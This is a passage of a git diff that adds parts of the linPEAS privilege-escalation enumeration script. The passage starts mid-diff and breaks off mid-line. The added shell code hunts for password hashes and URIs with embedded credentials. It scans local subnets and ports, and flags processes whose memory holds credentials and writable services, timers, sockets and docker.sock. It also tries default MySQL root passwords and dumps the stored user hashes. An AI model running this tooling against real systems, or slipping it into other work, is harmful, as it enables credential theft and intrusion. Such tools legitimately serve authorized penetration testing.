regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)' - timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m," - echo "" - fi - - if ! [ "$SUPERFAST" ] && ! [ "$FAST" ]; then - ##-- IF) Find URIs with user:password@hoststrings - print_2title "Finding URIs with user:password@host inside key folders" - timeout 150 find /var/www "$backup_folders_row" /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" "$HOMESEARCH" 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - echo "" - fi -fi diff --git a/linPEAS/builder/linpeas_parts/network_information.sh b/linPEAS/builder/linpeas_parts/network_information.sh new file mode 100644 index 0000000..92ebef1 --- /dev/null +++ b/linPEAS/builder/linpeas_parts/network_information.sh @@ -0,0 +1,176 @@ +########################################### +#---------) Network Information (---------# +########################################### + +if [ "$MACOS" ]; then + print_2title "Network Capabilities" + warn_exec system_profiler SPNetworkDataType + echo "" +fi + +#-- NI) Hostname, hosts and DNS +print_2title "Hostname, hosts and DNS" +cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null +warn_exec dnsdomainname 2>/dev/null +echo "" + +#-- NI) /etc/inetd.conf +print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" +(cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" +echo "" + +#-- NI) Interfaces +print_2title "Interfaces" +cat /etc/networks 2>/dev/null +(ifconfig || ip a) 2>/dev/null +echo "" + +#-- NI) Neighbours +print_2title "Networks and neighbours" +if [ "$MACOS" ]; then + netstat -rn 2>/dev/null +else + (route || ip n || cat /proc/net/route) 2>/dev/null +fi +(arp -e || arp -a || cat /proc/net/arp) 2>/dev/null +echo "" + +if [ "$MACPEAS" ]; then + print_2title "Firewall status" + warn_exec system_profiler SPFirewallDataType +fi + +#-- NI) Iptables +print_2title "Iptables rules" +(timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" +echo "" + +#-- NI) Ports +print_2title "Active Ports" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" +( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," +echo "" + +#-- NI) MacOS hardware ports +if [ "$MACPEAS" ]; then + print_2title "Hardware Ports" + networksetup -listallhardwareports + echo "" + + print_2title "VLANs" + networksetup -listVLANs + echo "" + + print_2title "Wifi Info" + networksetup -getinfo Wi-Fi + echo "" + + print_2title "Check Enabled Proxies" + scutil --proxy + echo "" + + print_2title "Wifi Proxy URL" + networksetup -getautoproxyurl Wi-Fi + echo "" + + print_2title "Wifi Web Proxy" + networksetup -getwebproxy Wi-Fi + echo "" + + print_2title "Wifi FTP Proxy" + networksetup -getftpproxy Wi-Fi + echo "" +fi + +#-- NI) tcpdump +print_2title "Can I sniff with tcpdump?" +timeout 1 tcpdump >/dev/null 2>&1 +if [ $? -eq 124 ]; then #If 124, then timed out == It worked + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" + echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi +echo "" + +#-- NI) Internet access +if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then + print_2title "Internet Access?" + check_tcp_80 2>/dev/null & + check_tcp_443 2>/dev/null & + check_icmp 2>/dev/null & + check_dns 2>/dev/null & + wait + echo "" +fi + +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then + if ! [ "$FOUND_NC" ]; then + printf $RED"[-] $SCAN_BAN_BAD\n$NC" + echo "The network is not going to be scanned..." + + else + print_2title "Scanning local networks (using /24)" + + if ! [ "$PING" ] && ![ "$FPING" ]; then + printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" + fi + + select_nc + local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") + printf "%s\n" "$local_ips" | while read local_ip; do + if ! [ -z "$local_ip" ]; then + print_3title "Discovering hosts in $local_ip/24" + + if [ "$PING" ] || [ "$FPING" ]; then + discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp + fi + + discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp + + sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips + rm $Wfolder/.ips.tmp 2>/dev/null + + while read disc_ip; do + me="" + if [ "$disc_ip" = "$local_ip" ]; then + me=" (local)" + fi + + echo "Scanning top ports of ${disc_ip}${me}" + (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null + echo "" + done < $Wfolder/.ips + + rm $Wfolder/.ips 2>/dev/null + echo "" + fi + done + fi +fi + +if [ "$MACOS" ]; then + print_2title "Any MacOS Sharing Service Enabled?" + rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l); + scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l); + flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l); + rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l); + rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l); + bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l); + printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; + echo "" + print_2title "VPN Creds" + system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED}," + echo "" + + print_2title "Bluetooth Info" + warn_exec system_profiler SPBluetoothDataType + echo "" + + print_2title "Ethernet Info" + warn_exec system_profiler SPEthernetDataType + echo "" + + print_2title "USB Info" + warn_exec system_profiler SPUSBDataType + echo "" +fi \ No newline at end of file diff --git a/linPEAS/builder/linpeas_parts/procs_crons_timers_srvcs_sockets.sh b/linPEAS/builder/linpeas_parts/procs_crons_timers_srvcs_sockets.sh new file mode 100644 index 0000000..fbb435e --- /dev/null +++ b/linPEAS/builder/linpeas_parts/procs_crons_timers_srvcs_sockets.sh @@ -0,0 +1,303 @@ +#################################################### +#-----) Processes & Cron & Services & Timers (-----# +#################################################### + +#-- PCS) Cleaned proccesses +print_2title "Cleaned processes" +if [ "$NOUSEPS" ]; then +printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC +fi +print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" + +if [ "$NOUSEPS" ]; then +print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," +pslist=$(print_ps) +else +(ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do + echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then + cpid=$(echo "$psline" | awk '{print $2}') + caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" + if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then + printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" + fi + fi +done +pslist=$(ps auxwww) +echo "" + +#-- PCS) Binary processes permissions +print_2title "Binary processes permissions" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" +binW="IniTialiZZinnggg" +ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do + if [ -w "$bpath" ]; then + binW="$binW|$bpath" + fi +done +ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v "$USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," +fi +echo "" + +#-- PCS) Files opened by processes belonging to other users +if ! [ "$IAMROOT" ]; then +print_2title "Files opened by processes belonging to other users" +print_info "This is usually empty because of the lack of privileges to read other user processes information" +lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +echo "" +fi + +#-- PCS) Processes with credentials inside memory +print_2title "Processes with credentials in memory (root req)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" +if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi +if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi +if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi +if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi +if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi +if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi +echo "" + +#-- PCS) Different processes 1 min +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then +print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" +temp_file=$(mktemp) +if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi +echo "" +fi + +#-- PCS) Cron +print_2title "Cron jobs" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" +command -v crontab 2>/dev/null || echo_not_found "crontab" +crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +command -v incrontab 2>/dev/null || echo_not_found "incrontab" +incrontab -l 2>/dev/null +ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" +cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +crontab -l -u "$USER" 2>/dev/null | tr -d "\r" +ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths +atq 2>/dev/null +echo "" + +if [ "$MACPEAS" ]; then +print_2title "Third party LaunchAgents & LaunchDemons" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" +ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null +echo "" + +print_2title "Writable System LaunchAgents & LaunchDemons" +find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do + program="" + program=$(defaults read "$f" Program 2>/dev/null) + if ! [ "$program" ]; then + program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) + fi + if [ -w "$program" ]; then + echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi +done +echo "" + +print_2title "StartupItems" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" +ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null +echo "" + +print_2title "Login Items" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" +osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null +echo "" + +print_2title "SPStartupItemDataType" +system_profiler SPStartupItemDataType +echo "" + +print_2title "Emond scripts" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" +ls -l /private/var/db/emondClients +echo "" +fi + +#-- PCS) Services +print_2title "Services" +print_info "Search for outdated versions" +(service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" +echo "" + +#-- PSC) systemd PATH +print_2title "Systemd PATH" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" +systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" +WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") +echo "" + +#-- PSC) .service files +#TODO: .service files in MACOS are folders +print_2title "Analyzing .service files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" +printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do +if [ ! -O "$s" ]; then #Remove services that belongs to the current user + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" + fi + servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths + printf "%s\n" "$servicebinpaths\n" | while read sp; do + if [ -w "$sp" ]; then + echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" + fi + done + relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") + relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") + if [ "$relpath1" ] || [ "$relpath2" ]; then + if [ "$WRITABLESYSTEMDPATH" ]; then + echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; + else + echo "$s is executing some relative path" + fi + fi +fi +done +if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi +echo "" + +#-- PSC) Timers +print_2title "System timers" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" +(systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found +echo "" + +#-- PSC) .timer files +print_2title "Analyzing .timer files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" +printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do +if ! [ "$IAMROOT" ] && [ -w "$t" ]; then + echo "$t" | sed -${E} "s,.*,${SED_RED},g" +fi +timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) +printf "%s\n" "$timerbinpaths" | while read tb; do + if [ -w "$tb" ]; then + echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" + fi +done +#relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" +#for rp in "$relpath"; do +# echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" +#done +done +echo "" + +#-- PSC) .socket files +#TODO: .socket files in MACOS are folders +if ! [ "$IAMROOT" ]; then +print_2title "Analyzing .socket files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" +printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" + fi + socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') + printf "%s\n" "$socketsbinpaths" | while read sb; do + if [ -w "$sb" ]; then + echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" + fi + done + socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') + printf "%s\n" "$socketslistpaths" | while read sl; do + if [ -w "$sl" ]; then + echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; + fi + done +done +if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then + echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" +fi +if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then + echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" +fi +echo "" + +print_2title "Unix Sockets Listening" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" +# Search sockets using netstat and ss +unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) +if ! [ "$unix_scks_list" ];then + unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") +fi +if ! [ "$unix_scks_list" ];then + unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) +fi + +# But also search socket files +unix_scks_list2=$(find / -type s 2>/dev/null) + +# Detele repeated dockets and check permissions +(printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do + perms="" + if [ -r "$l" ]; then + perms="Read " + fi + if [ -w "$l" ];then + perms="${perms}Write" + fi + if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; + else + echo "$l" | sed -${E} "s,$l,${SED_RED},g" + echo " └─(${RED}${perms}${NC})" + # Try to contact the socket + socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) + if [ $? -eq 0 ]; then + owner=$(ls -l "$s" | cut -d ' ' -f 3) + echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" + echo "$socketcurl" | head -n 30 + fi + fi +done +echo "" +fi + +#-- PSC) Writable and weak policies in D-Bus config files +print_2title "D-Bus config files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" +if [ "$PSTORAGE_DBUS" ]; then +printf "%s\n" "$PSTORAGE_DBUS" | while read d; do + for f in $d/*; do + if ! [ "$IAMROOT" ] && [ -w "$f" ]; then + echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" + fi + + genpol=$(grep "" "$f" 2>/dev/null) + if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi + + userpol=$(grep "/dev/null | grep -v "root") + if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #for g in `groups`; do + # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi + #done + grppol=$(grep "/dev/null | grep -v "root") + if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + + #TODO: identify allows in context="default" + done +done +fi +echo "" + +print_2title "D-Bus Service Objects list" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" +dbuslist=$(busctl list 2>/dev/null) +if [ "$dbuslist" ]; then +busctl list | while read line; do + echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; + if ! echo "$line" | grep -qE "$dbuslistG"; then + srvc_object=$(echo $line | cut -d " " -f1) + srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') + if [ "$srvc_object_info" ]; then + echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," + fi + fi +done +else echo_not_found "busctl" +fi \ No newline at end of file diff --git a/linPEAS/builder/linpeas_parts/software_information.sh b/linPEAS/builder/linpeas_parts/software_information.sh new file mode 100644 index 0000000..49436fd --- /dev/null +++ b/linPEAS/builder/linpeas_parts/software_information.sh @@ -0,0 +1,553 @@ +########################################### +#--------) Software Information (---------# +########################################### + +#-- SI) Mysql version +print_2title "MySQL version" +mysql --version 2>/dev/null || echo_not_found "mysql" +echo "" + +#-- SI) Mysql connection root/root +print_list "MySQL connection using default root/root ........... " +mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null) +if [ "$mysqlconnect" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +#-- SI) Mysql connection root/toor +print_list "MySQL connection using root/toor ................... " +mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null) +if [ "$mysqlconnect" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +#-- SI) Mysql connection root/NOPASS +mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null) +print_list "MySQL connection using root/NOPASS ................. " +if [ "$mysqlconnectnopass" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +#-- SI) Mysql credentials +print_2title "Searching mysql credentials and exec" +if [ "$PSTORAGE_MYSQL" ]; then + printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do + for f in $(find $d -name debian.cnf 2>/dev/null); do + if [ -r "$f" ]; then + echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," + cat "$f" + fi + done + for f in 